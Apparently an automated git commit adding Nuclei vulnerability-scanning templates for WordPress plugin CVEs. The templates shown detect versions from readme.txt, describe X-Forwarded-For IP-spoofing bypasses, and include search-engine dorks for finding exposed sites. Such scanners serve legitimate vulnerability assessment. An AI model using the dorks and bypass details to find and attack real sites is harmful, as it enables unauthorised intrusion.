From c22ff795339d7badd150cb9de47feb43e0a8b2d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 31 Aug 2024 12:36:24 +0000 Subject: [PATCH] 20240831 --- date.txt | 2 +- poc.txt | 36 ++++++++ ...4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml | 59 +++++++++++++ ...4536-cbca2c22fe44b388466f971246767370.yaml | 59 +++++++++++++ ...4539-7a30287ecd3463157871780d6cb74779.yaml | 59 +++++++++++++ poc/cve/CVE-2024-2694.yaml | 59 +++++++++++++ ...3886-5b264146b1ead99350dd9d50b9b165a5.yaml | 59 +++++++++++++ poc/cve/CVE-2024-3998.yaml | 59 +++++++++++++ ...3212-b599c8548f771f0451cdc13214f7ff68.yaml | 59 +++++++++++++ ...3254-ab3e4aac5098aa3c00587af765319448.yaml | 59 +++++++++++++ poc/cve/CVE-2024-4401.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5024.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5061.yaml | 59 +++++++++++++ ...5212-26e8ea237e5eb184a7a3f6926818b07b.yaml | 59 +++++++++++++ ...5726-014e0e9e4a215d0587195d5062af61a5.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5784.yaml | 59 +++++++++++++ poc/cve/CVE-2024-5879.yaml | 59 +++++++++++++ poc/cve/CVE-2024-7122.yaml | 59 +++++++++++++ ...7435-56bbd99bfe68d581fd709483401a1c1a.yaml | 59 +++++++++++++ ...7717-8b2d72f894c49fa210faf06966bb467e.yaml | 59 +++++++++++++ poc/cve/CVE-2024-7858.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8016.yaml | 59 +++++++++++++ ...8108-388981d89511f13ba76287252ce2c890.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8252.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8274.yaml | 59 +++++++++++++ ...8276-abcb50055a0fdc77a95290d651b9dbcc.yaml | 59 +++++++++++++ poc/cve/CVE-2024-8319.yaml | 59 +++++++++++++ poc/cve/cve-2001-1473.yaml | 8 +- poc/cve/cve-2008-5587.yaml | 19 +++-- poc/cve/cve-2016-6210.yaml | 8 +- poc/cve/cve-2017-14524.yaml | 42 +++------- poc/cve/cve-2021-44451.yaml | 8 ++ poc/header/header-injection.yaml | 2 +- poc/http/cl-te-http-smuggling.yaml | 72 ++++++++-------- .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 42 ++++------ poc/other/Nsfocus_sas_getFile_read.yaml | 31 ++----- ...tire-018e03e3d84deb0b9ea4b368a9e735bb.yaml | 59 +++++++++++++ poc/other/events-calendar-pro.yaml | 59 +++++++++++++ poc/other/jenk.yaml | 2 +- ...mage-1c9c43ea93da339cf4ddfe98cd5e553a.yaml | 59 +++++++++++++ ...oser-3b0822f9c769d60e753b8fc716feb8bc.yaml | 59 +++++++++++++ ...oser-a84bf528fd8a808bc88b049d18e64cda.yaml | 59 +++++++++++++ .../Hikvision_applyCT_RCE.yaml | 45 +++++++--- ...8276-abcb50055a0fdc77a95290d651b9dbcc.yaml | 59 +++++++++++++ .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 42 ++++------ .../Nsfocus_NF_Firewall_FileUpload.yaml | 84 ++++++++----------- ...wall-aecd7866e19c9efd3d56871b357c8881.yaml | 59 +++++++++++++ ...wall-5048b84b845dea0b88ed33d7dc34347e.yaml | 59 +++++++++++++ ...rber-4a64f9ad31b78ab78c48428c5a85590b.yaml | 59 +++++++++++++ ...ager-29722e1d187e63b6b325ae129c9c70d3.yaml | 59 +++++++++++++ ...olio-dcf59e219d34d9e2d14f575ceb25f541.yaml | 59 +++++++++++++ 51 files changed, 2350 insertions(+), 217 deletions(-) create mode 100644 poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml create mode 100644 poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml create mode 100644 poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml create mode 100644 poc/cve/CVE-2024-2694.yaml create mode 100644 poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml create mode 100644 poc/cve/CVE-2024-3998.yaml create mode 100644 poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml create mode 100644 poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml create mode 100644 poc/cve/CVE-2024-4401.yaml create mode 100644 poc/cve/CVE-2024-5024.yaml create mode 100644 poc/cve/CVE-2024-5061.yaml create mode 100644 poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml create mode 100644 poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml create mode 100644 poc/cve/CVE-2024-5784.yaml create mode 100644 poc/cve/CVE-2024-5879.yaml create mode 100644 poc/cve/CVE-2024-7122.yaml create mode 100644 poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml create mode 100644 poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml create mode 100644 poc/cve/CVE-2024-7858.yaml create mode 100644 poc/cve/CVE-2024-8016.yaml create mode 100644 poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml create mode 100644 poc/cve/CVE-2024-8252.yaml create mode 100644 poc/cve/CVE-2024-8274.yaml create mode 100644 poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml create mode 100644 poc/cve/CVE-2024-8319.yaml create mode 100644 poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml create mode 100644 poc/other/events-calendar-pro.yaml create mode 100644 poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml create mode 100644 poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml create mode 100644 poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml create mode 100644 poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml create mode 100644 poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml create mode 100644 poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml create mode 100644 poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml create mode 100644 poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml create mode 100644 poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml diff --git a/date.txt b/date.txt index 8021f79746..7036fab477 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240830 +20240831 diff --git a/poc.txt b/poc.txt index fc270f2c73..686feab606 100644 --- a/poc.txt +++ b/poc.txt @@ -21642,6 +21642,7 @@ ./poc/cve/CVE-2022-40975.yaml ./poc/cve/CVE-2022-4099-efabe65e0636127b900f654341e2d21b.yaml ./poc/cve/CVE-2022-4099.yaml +./poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml ./poc/cve/CVE-2022-4101-ff9c428babf09501938ec8b47a7ff0b5.yaml ./poc/cve/CVE-2022-4101.yaml ./poc/cve/CVE-2022-4102-211a125e03141593ca6a2a03eab40ec0.yaml @@ -22363,6 +22364,7 @@ ./poc/cve/CVE-2022-45358.yaml ./poc/cve/CVE-2022-45359-b36586431dff2aad1fae7b081e9eb505.yaml ./poc/cve/CVE-2022-45359.yaml +./poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml ./poc/cve/CVE-2022-45360-207ef17540c22dd0793408d606b91bda.yaml ./poc/cve/CVE-2022-45360.yaml ./poc/cve/CVE-2022-45361-aa79324e8a1a2b2db7d009a7aa76d972.yaml @@ -22401,6 +22403,7 @@ ./poc/cve/CVE-2022-45376.yaml ./poc/cve/CVE-2022-45377-f99be6f5db095fa34ac8836d9c3bf756.yaml ./poc/cve/CVE-2022-45377.yaml +./poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml ./poc/cve/CVE-2022-4542-f62d4c5bcf581eb4208970f7bf92c622.yaml ./poc/cve/CVE-2022-4542.yaml ./poc/cve/CVE-2022-4544-4a43b5c1e9b5ac07f83a1ad6288e2487.yaml @@ -35007,6 +35010,7 @@ ./poc/cve/CVE-2024-2693-647bc0d6e21e08c5754ccb6bcd1aae5c.yaml ./poc/cve/CVE-2024-2693.yaml ./poc/cve/CVE-2024-2694-b120e064dbe03fdfe7dc85edf005b468.yaml +./poc/cve/CVE-2024-2694.yaml ./poc/cve/CVE-2024-2695-ae730861a36dba83eb67def8728d825a.yaml ./poc/cve/CVE-2024-2695-dcc8ab86728871c2ab1f322b32d5d24a.yaml ./poc/cve/CVE-2024-2695.yaml @@ -39496,6 +39500,7 @@ ./poc/cve/CVE-2024-3883.yaml ./poc/cve/CVE-2024-3885-9e0a7124350833ada45c8c2089abea17.yaml ./poc/cve/CVE-2024-3885.yaml +./poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml ./poc/cve/CVE-2024-3887-c69a35937d64f9aabf71399960d846ed.yaml ./poc/cve/CVE-2024-3887.yaml ./poc/cve/CVE-2024-3888-73a7dff9e7fc032d9c7b3504d9e32105.yaml @@ -39742,6 +39747,7 @@ ./poc/cve/CVE-2024-3997-ec2b985dc77b9e8be9179278d94ac597.yaml ./poc/cve/CVE-2024-3997.yaml ./poc/cve/CVE-2024-3998-3e30ffebe59d9a76218cb85864c1c93f.yaml +./poc/cve/CVE-2024-3998.yaml ./poc/cve/CVE-2024-3999-c476d9afb5ffc3ca8d446456d56d241f.yaml ./poc/cve/CVE-2024-3999.yaml ./poc/cve/CVE-2024-4000-413f9aad8039820df563829dd8dd16d6.yaml @@ -40063,6 +40069,7 @@ ./poc/cve/CVE-2024-43210.yaml ./poc/cve/CVE-2024-43211-52583efb98a1ee87166361a87199594d.yaml ./poc/cve/CVE-2024-43211.yaml +./poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml ./poc/cve/CVE-2024-43212-fa7c63c9c1acaf40e2a0fa149e79e1fd.yaml ./poc/cve/CVE-2024-43212.yaml ./poc/cve/CVE-2024-43213-035ab3596c728eee900f004610ee954d.yaml @@ -40146,6 +40153,7 @@ ./poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml ./poc/cve/CVE-2024-43253.yaml ./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml +./poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml ./poc/cve/CVE-2024-43254.yaml ./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml ./poc/cve/CVE-2024-43255.yaml @@ -40458,6 +40466,7 @@ ./poc/cve/CVE-2024-4400-edb034274ef6f17041114a62daa8b47d.yaml ./poc/cve/CVE-2024-4400.yaml ./poc/cve/CVE-2024-4401-d790d6521995cbca6bedf9a614f719bf.yaml +./poc/cve/CVE-2024-4401.yaml ./poc/cve/CVE-2024-4404-3225832ef59af3d93e669e4f0630d732.yaml ./poc/cve/CVE-2024-4404.yaml ./poc/cve/CVE-2024-4409-bd7b37af206b0db99929fc562e902a9e.yaml @@ -40893,6 +40902,7 @@ ./poc/cve/CVE-2024-5021-1b48a97f4f87b8e1c0d35951dcf47c52.yaml ./poc/cve/CVE-2024-5021.yaml ./poc/cve/CVE-2024-5024-df0641cd7d9eed4752dc979388d29728.yaml +./poc/cve/CVE-2024-5024.yaml ./poc/cve/CVE-2024-5025-f6e5bc7c36789d49a83912b9c62d03f6.yaml ./poc/cve/CVE-2024-5025.yaml ./poc/cve/CVE-2024-5028-2b1c7753e02398d12917feca766a8f54.yaml @@ -40922,6 +40932,7 @@ ./poc/cve/CVE-2024-5060-0e9bb89e270fce112d686bcb31ddac36.yaml ./poc/cve/CVE-2024-5060.yaml ./poc/cve/CVE-2024-5061-e85fb07ba4a08a3b3d95773fe18c51f6.yaml +./poc/cve/CVE-2024-5061.yaml ./poc/cve/CVE-2024-5071-783fe5cda41afb7fa1d0cebcc413aaf2.yaml ./poc/cve/CVE-2024-5071-b9e7eecb062d13ae3a35094e64731713.yaml ./poc/cve/CVE-2024-5071.yaml @@ -41010,6 +41021,7 @@ ./poc/cve/CVE-2024-5205.yaml ./poc/cve/CVE-2024-5207-dfe92838983c441ca6954031b5866f4e.yaml ./poc/cve/CVE-2024-5207.yaml +./poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml ./poc/cve/CVE-2024-5215-0170d5acc9b537b31bb3fad32634325d.yaml ./poc/cve/CVE-2024-5215.yaml ./poc/cve/CVE-2024-5217.yaml @@ -41336,6 +41348,7 @@ ./poc/cve/CVE-2024-5715.yaml ./poc/cve/CVE-2024-5724-4ec214434fd2f861667853a0711db2bf.yaml ./poc/cve/CVE-2024-5724.yaml +./poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml ./poc/cve/CVE-2024-5726-356112c2928a1e694b7bf670e7c30b58.yaml ./poc/cve/CVE-2024-5726.yaml ./poc/cve/CVE-2024-5727-08c9ece2ef96c189022a2e500fdce8e4.yaml @@ -41365,6 +41378,7 @@ ./poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/cve/CVE-2024-5770.yaml ./poc/cve/CVE-2024-5784-0014276fabbee1d09ebf48d3bcb8d1fe.yaml +./poc/cve/CVE-2024-5784.yaml ./poc/cve/CVE-2024-5787-ba698dc9e13c3c5e0d40143b11aa6de4.yaml ./poc/cve/CVE-2024-5787.yaml ./poc/cve/CVE-2024-5788-28fe2f5078d75f5024e6c25cc111ffd2.yaml @@ -41424,6 +41438,7 @@ ./poc/cve/CVE-2024-5871-bdd808d6a9eceafe261c336341d9e130.yaml ./poc/cve/CVE-2024-5871.yaml ./poc/cve/CVE-2024-5879-15e47d64ae81bc253ae61d7b9ab17d63.yaml +./poc/cve/CVE-2024-5879.yaml ./poc/cve/CVE-2024-5880-da35cf349d9e9d256e9d4d267817f858.yaml ./poc/cve/CVE-2024-5880.yaml ./poc/cve/CVE-2024-5881-deb2b9d2631d7547b1cfede5484472ab.yaml @@ -42076,6 +42091,7 @@ ./poc/cve/CVE-2024-7100-ad8e27985a77f89f3ffd15a9cd3c761c.yaml ./poc/cve/CVE-2024-7100.yaml ./poc/cve/CVE-2024-7122-332eadd538ee19c7f5056f343ea0b155.yaml +./poc/cve/CVE-2024-7122.yaml ./poc/cve/CVE-2024-7134-68ccbd22e014b574fd8573f2d56f4553.yaml ./poc/cve/CVE-2024-7134.yaml ./poc/cve/CVE-2024-7135-4efde48e672954d3ec911965413e7bde.yaml @@ -42149,6 +42165,7 @@ ./poc/cve/CVE-2024-7420.yaml ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml ./poc/cve/CVE-2024-7422.yaml +./poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml ./poc/cve/CVE-2024-7447.yaml ./poc/cve/CVE-2024-7484-5be14b55ae30eebe36f1e5fcad1d160a.yaml @@ -42224,6 +42241,7 @@ ./poc/cve/CVE-2024-7702.yaml ./poc/cve/CVE-2024-7703-7d232ae776193850ef9d74eec7d98698.yaml ./poc/cve/CVE-2024-7703.yaml +./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml ./poc/cve/CVE-2024-7775.yaml ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml @@ -42261,6 +42279,7 @@ ./poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml ./poc/cve/CVE-2024-7857.yaml ./poc/cve/CVE-2024-7858-ee11b1c569d7435d78bdfcf72833bbc0.yaml +./poc/cve/CVE-2024-7858.yaml ./poc/cve/CVE-2024-7860-7bfa7ad373e4b2369c7238a1709273fe.yaml ./poc/cve/CVE-2024-7860.yaml ./poc/cve/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml @@ -42274,6 +42293,7 @@ ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml ./poc/cve/CVE-2024-7918.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml +./poc/cve/CVE-2024-8016.yaml ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml ./poc/cve/CVE-2024-8030.yaml ./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml @@ -42294,6 +42314,7 @@ ./poc/cve/CVE-2024-8056.yaml ./poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml ./poc/cve/CVE-2024-8091.yaml +./poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml ./poc/cve/CVE-2024-8120.yaml ./poc/cve/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml @@ -42305,8 +42326,12 @@ ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml +./poc/cve/CVE-2024-8252.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml +./poc/cve/CVE-2024-8274.yaml +./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/cve/CVE-2024-8319-f52695adcae621062e419e0168d0ec9c.yaml +./poc/cve/CVE-2024-8319.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -64184,6 +64209,7 @@ ./poc/other/attendance-manager-e0ca84a106bbce24a15a50a52260c615.yaml ./poc/other/attendance-manager.yaml ./poc/other/attesa-extra.yaml +./poc/other/attire-018e03e3d84deb0b9ea4b368a9e735bb.yaml ./poc/other/attire-blocks-4d0bda665c71d62ec3979730095585b3.yaml ./poc/other/attire-blocks.yaml ./poc/other/attorney-75ae42f95c5029a5c34276ce81634c4d.yaml @@ -72049,6 +72075,7 @@ ./poc/other/events-addon-for-elementor-plugin.yaml ./poc/other/events-addon-for-elementor.yaml ./poc/other/events-calendar-pro-906106af4e69d60e26f99cff1906aa71.yaml +./poc/other/events-calendar-pro.yaml ./poc/other/events-calendar-registration-booking-by-events-plus-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/events-calendar-registration-booking-by-events-plus.yaml ./poc/other/events-made-easy-00e7f5be1ab35984fe7530e3d9ef1afb.yaml @@ -86108,6 +86135,7 @@ ./poc/other/share-one-drive-8aefbdc94d261c5ffcf5b6d1472c5159.yaml ./poc/other/share-one-drive.yaml ./poc/other/share-this-c141fa5002265cf4cb976ed6cf31fc6c.yaml +./poc/other/share-this-image-1c9c43ea93da339cf4ddfe98cd5e553a.yaml ./poc/other/share-this-image-576f17348faf1cebc874fccfe14a8b45.yaml ./poc/other/share-this-image-af2bcc66229bf5bd6c08d48a24366221.yaml ./poc/other/share-this-image.yaml @@ -88807,9 +88835,11 @@ ./poc/other/td-cloud-library-1c4748f99f4bb0e2e425c3b000b9c0fc.yaml ./poc/other/td-cloud-library.yaml ./poc/other/td-composer-1cda7428f15f4698d6291b17e9baa214.yaml +./poc/other/td-composer-3b0822f9c769d60e753b8fc716feb8bc.yaml ./poc/other/td-composer-4f5ed17eac889295b2deedaa4975fd95.yaml ./poc/other/td-composer-80143192a811ca26978bf2e6218c23f6.yaml ./poc/other/td-composer-9494a3ec135164d73110d9ffc217777e.yaml +./poc/other/td-composer-a84bf528fd8a808bc88b049d18e64cda.yaml ./poc/other/td-composer-ce48f32c9e769abd4cb0ab1ac1ace80c.yaml ./poc/other/td-composer-d39cb83229da357ab1af912bf2630331.yaml ./poc/other/td-composer-f3f203d9ab101f9d04ccf12ec6b5d164.yaml @@ -102170,6 +102200,7 @@ ./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml +./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/sql/Changdao-165-SQLi.yaml ./poc/sql/Cmseasy-Http-Head-sqli.yaml ./poc/sql/Cmseasy-celive-sqli.yaml @@ -110381,6 +110412,7 @@ ./poc/web/wapppress-builds-android-app-for-website-93eb7c704e6e0ef25aa6b8829b01d3fd.yaml ./poc/web/wapppress-builds-android-app-for-website.yaml ./poc/web/web-application-firewall-844b9d1d24421cab341a4ecc56416b51.yaml +./poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml ./poc/web/web-application-firewall.yaml ./poc/web/web-cache-poising.yaml ./poc/web/web-cache-poisoning.yaml @@ -111688,6 +111720,7 @@ ./poc/wordpress/instawp-connect-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/instawp-connect-plugin.yaml ./poc/wordpress/instawp-connect.yaml +./poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml ./poc/wordpress/ip-vault-wp-firewall-595200d561a42d70e218defec57a75a8.yaml ./poc/wordpress/ip-vault-wp-firewall.yaml ./poc/wordpress/itempropwp-3416bfa27ed25f7ffea8196830edb064.yaml @@ -113913,6 +113946,7 @@ ./poc/wordpress/wp-central.yaml ./poc/wordpress/wp-cerber-147fd304b3df157c7f7d15a91cde2e37.yaml ./poc/wordpress/wp-cerber-2de93f4e30326bd812b1fce3dd004555.yaml +./poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml ./poc/wordpress/wp-cerber-87f6796ba287e18749650930f19b92f6.yaml ./poc/wordpress/wp-cerber-925189d34deb9cf3a7da967fb678739e.yaml ./poc/wordpress/wp-cerber-a6210c801ebe77c8a4b0906ac51e8e6f.yaml @@ -114639,6 +114673,7 @@ ./poc/wordpress/wp-events-7838675c7859ff8a7694725464a2c880.yaml ./poc/wordpress/wp-events-939c8e41990e721256330f6828258871.yaml ./poc/wordpress/wp-events-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml ./poc/wordpress/wp-events-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-events-plugin.yaml ./poc/wordpress/wp-events.yaml @@ -118604,6 +118639,7 @@ ./poc/wordpress/wpzoom-inspiro-pro-9bf7823e174d198324751124dceb7c43.yaml ./poc/wordpress/wpzoom-inspiro-pro.yaml ./poc/wordpress/wpzoom-portfolio-34081bbf6d948f7de8763d03d9ef73e2.yaml +./poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml ./poc/wordpress/wpzoom-portfolio.yaml ./poc/wordpress/wpzoom-shortcodes-9bd9f0c961d140a7a58265e49125c3ca.yaml ./poc/wordpress/wpzoom-shortcodes.yaml diff --git a/poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml b/poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml new file mode 100644 index 0000000000..04b14575a6 --- /dev/null +++ b/poc/cve/CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4100-6846e3140a5dc10367fd9a3bbcde3cfd + +info: + name: > + WP Cerber Security <= 9.4 - IP Protection Bypass + author: topscoder + severity: medium + description: > + The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4100 + metadata: + fofa-query: "wp-content/plugins/wp-cerber/" + google-query: inurl:"/wp-content/plugins/wp-cerber/" + shodan-query: 'vuln:CVE-2022-4100' + tags: cve,wordpress,wp-plugin,wp-cerber,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-cerber/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-cerber" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.4') \ No newline at end of file diff --git a/poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml b/poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml new file mode 100644 index 0000000000..92c8b3b6a5 --- /dev/null +++ b/poc/cve/CVE-2022-4536-cbca2c22fe44b388466f971246767370.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4536-cbca2c22fe44b388466f971246767370 + +info: + name: > + IP Vault – WP Firewall <= 1.1 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The IP Vault – WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4536 + metadata: + fofa-query: "wp-content/plugins/ip-vault-wp-firewall/" + google-query: inurl:"/wp-content/plugins/ip-vault-wp-firewall/" + shodan-query: 'vuln:CVE-2022-4536' + tags: cve,wordpress,wp-plugin,ip-vault-wp-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-vault-wp-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-vault-wp-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml b/poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml new file mode 100644 index 0000000000..75864910b2 --- /dev/null +++ b/poc/cve/CVE-2022-4539-7a30287ecd3463157871780d6cb74779.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-4539-7a30287ecd3463157871780d6cb74779 + +info: + name: > + Web Application Firewall <= 2.1.2 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: medium + description: > + The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e99531c-8742-4f91-8525-65bb3cb06644?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-4539 + metadata: + fofa-query: "wp-content/plugins/web-application-firewall/" + google-query: inurl:"/wp-content/plugins/web-application-firewall/" + shodan-query: 'vuln:CVE-2022-4539' + tags: cve,wordpress,wp-plugin,web-application-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/web-application-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "web-application-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-2694.yaml b/poc/cve/CVE-2024-2694.yaml new file mode 100644 index 0000000000..b4ffc1d32d --- /dev/null +++ b/poc/cve/CVE-2024-2694.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-2694 + +info: + name: > + Betheme <= 27.5.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Betheme theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 27.5.6 via deserialization of untrusted input of the 'mfn-page-items' post meta value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is 